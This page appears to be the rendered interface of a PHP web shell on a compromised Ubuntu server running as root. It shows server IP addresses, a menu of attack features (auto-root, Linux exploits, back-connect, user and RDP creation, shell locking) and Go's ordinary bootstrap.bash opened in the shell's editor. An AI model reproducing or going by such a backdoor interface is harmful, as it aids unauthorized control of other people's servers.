Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
archive
[ DIR ]
drwxr-xr-x
bufio
[ DIR ]
drwxr-xr-x
builtin
[ DIR ]
drwxr-xr-x
bytes
[ DIR ]
drwxr-xr-x
cmd
[ DIR ]
drwxr-xr-x
compress
[ DIR ]
drwxr-xr-x
container
[ DIR ]
drwxr-xr-x
context
[ DIR ]
drwxr-xr-x
crypto
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
debug
[ DIR ]
drwxr-xr-x
encoding
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
expvar
[ DIR ]
drwxr-xr-x
flag
[ DIR ]
drwxr-xr-x
fmt
[ DIR ]
drwxr-xr-x
go
[ DIR ]
drwxr-xr-x
hash
[ DIR ]
drwxr-xr-x
html
[ DIR ]
drwxr-xr-x
image
[ DIR ]
drwxr-xr-x
index
[ DIR ]
drwxr-xr-x
internal
[ DIR ]
drwxr-xr-x
io
[ DIR ]
drwxr-xr-x
log
[ DIR ]
drwxr-xr-x
math
[ DIR ]
drwxr-xr-x
mime
[ DIR ]
drwxr-xr-x
net
[ DIR ]
drwxr-xr-x
os
[ DIR ]
drwxr-xr-x
path
[ DIR ]
drwxr-xr-x
plugin
[ DIR ]
drwxr-xr-x
reflect
[ DIR ]
drwxr-xr-x
regexp
[ DIR ]
drwxr-xr-x
runtime
[ DIR ]
drwxr-xr-x
sort
[ DIR ]
drwxr-xr-x
strconv
[ DIR ]
drwxr-xr-x
strings
[ DIR ]
drwxr-xr-x
sync
[ DIR ]
drwxr-xr-x
syscall
[ DIR ]
drwxr-xr-x
testdata
[ DIR ]
drwxr-xr-x
testing
[ DIR ]
drwxr-xr-x
text
[ DIR ]
drwxr-xr-x
time
[ DIR ]
drwxr-xr-x
unicode
[ DIR ]
drwxr-xr-x
unsafe
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
Make.dist
553
B
-rw-r--r--
README.vendor
2.24
KB
-rw-r--r--
all.bash
407
B
-rwxr-xr-x
all.bat
726
B
-rw-r--r--
all.rc
385
B
-rwxr-xr-x
bootstrap.bash
3.7
KB
-rwxr-xr-x
buildall.bash
1.96
KB
-rwxr-xr-x
clean.bash
521
B
-rwxr-xr-x
clean.bat
565
B
-rw-r--r--
clean.rc
380
B
-rwxr-xr-x
cmp.bash
1.48
KB
-rw-r--r--
go.mod
275
B
-rw-r--r--
go.sum
1.53
KB
-rw-r--r--
iostest.bash
1.94
KB
-rwxr-xr-x
make.bash
6.79
KB
-rwxr-xr-x
make.bat
3.91
KB
-rw-r--r--
make.rc
3.1
KB
-rwxr-xr-x
race.bash
1021
B
-rwxr-xr-x
race.bat
1.02
KB
-rw-r--r--
run.bash
2.1
KB
-rwxr-xr-x
run.bat
1.14
KB
-rw-r--r--
run.rc
435
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.bash
#!/usr/bin/env bash # Copyright 2015 The Go Authors. All rights reserved. # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file. # When run as (for example) # # GOOS=linux GOARCH=ppc64 bootstrap.bash # # this script cross-compiles a toolchain for that GOOS/GOARCH # combination, leaving the resulting tree in ../../go-${GOOS}-${GOARCH}-bootstrap. # That tree can be copied to a machine of the given target type # and used as $GOROOT_BOOTSTRAP to bootstrap a local build. # # Only changes that have been committed to Git (at least locally, # not necessary reviewed and submitted to master) are included in the tree. # # As a special case for Go's internal use only, if the # BOOTSTRAP_FORMAT environment variable is set to "mintgz", the # resulting archive is intended for use by the Go build system and # differs in that the mintgz file: # * is a tar.gz file instead of bz2 # * has many unnecessary files deleted to reduce its size # * does not have a shared directory component for each tar entry # Do not depend on the mintgz format. set -e if [ "$GOOS" = "" -o "$GOARCH" = "" ]; then echo "usage: GOOS=os GOARCH=arch ./bootstrap.bash" >&2 exit 2 fi targ="../../go-${GOOS}-${GOARCH}-bootstrap" if [ -e $targ ]; then echo "$targ already exists; remove before continuing" exit 2 fi if [ "$BOOTSTRAP_FORMAT" != "mintgz" -a "$BOOTSTRAP_FORMAT" != "" ]; then echo "unknown BOOTSTRAP_FORMAT format" exit 2 fi unset GOROOT src=$(cd .. && pwd) echo "#### Copying to $targ" cp -Rp "$src" "$targ" cd "$targ" echo echo "#### Cleaning $targ" chmod -R +w . rm -f .gitignore if [ -e .git ]; then git clean -f -d fi echo echo "#### Building $targ" echo cd src ./make.bash --no-banner gohostos="$(../bin/go env GOHOSTOS)" gohostarch="$(../bin/go env GOHOSTARCH)" goos="$(../bin/go env GOOS)" goarch="$(../bin/go env GOARCH)" # NOTE: Cannot invoke go command after this point. # We're about to delete all but the cross-compiled binaries. cd .. if [ "$goos" = "$gohostos" -a "$goarch" = "$gohostarch" ]; then # cross-compile for local system. nothing to copy. # useful if you've bootstrapped yourself but want to # prepare a clean toolchain for others. true else rm -f bin/go_${goos}_${goarch}_exec mv bin/*_*/* bin rmdir bin/*_* rm -rf "pkg/${gohostos}_${gohostarch}" "pkg/tool/${gohostos}_${gohostarch}" fi if [ "$BOOTSTRAP_FORMAT" = "mintgz" ]; then # Fetch git revision before rm -rf .git. GITREV=$(git rev-parse --short HEAD) fi rm -rf pkg/bootstrap pkg/obj .git # Support for building minimal tar.gz for the builders. # The build system doesn't support bzip2, and by deleting more stuff, # they start faster, especially on machines without fast filesystems # and things like tmpfs configures. # Do not depend on this format. It's for internal use only. if [ "$BOOTSTRAP_FORMAT" = "mintgz" ]; then OUTGZ="gobootstrap-${GOOS}-${GOARCH}-${GITREV}.tar.gz" echo "Preparing to generate build system's ${OUTGZ}; cleaning ..." rm -rf bin/gofmt rm -rf src/runtime/race/race_*.syso rm -rf api test doc misc/cgo/test misc/trace rm -rf pkg/tool/*_*/{addr2line,api,cgo,cover,doc,fix,nm,objdump,pack,pprof,test2json,trace,vet} rm -rf pkg/*_*/{image,database,cmd} rm -rf $(find . -type d -name testdata) find . -type f -name '*_test.go' -exec rm {} \; # git clean doesn't clean symlinks apparently, and the buildlet # rejects them, so: find . -type l -exec rm {} \; echo "Writing ${OUTGZ} ..." tar cf - . | gzip -9 > ../$OUTGZ cd .. ls -l "$(pwd)/$OUTGZ" exit 0 fi echo ---- echo Bootstrap toolchain for "$GOOS/$GOARCH" installed in "$(pwd)". echo Building tbz. cd .. tar cf - "go-${GOOS}-${GOARCH}-bootstrap" | bzip2 -9 >"go-${GOOS}-${GOARCH}-bootstrap.tbz" ls -l "$(pwd)/go-${GOOS}-${GOARCH}-bootstrap.tbz" exit 0
Close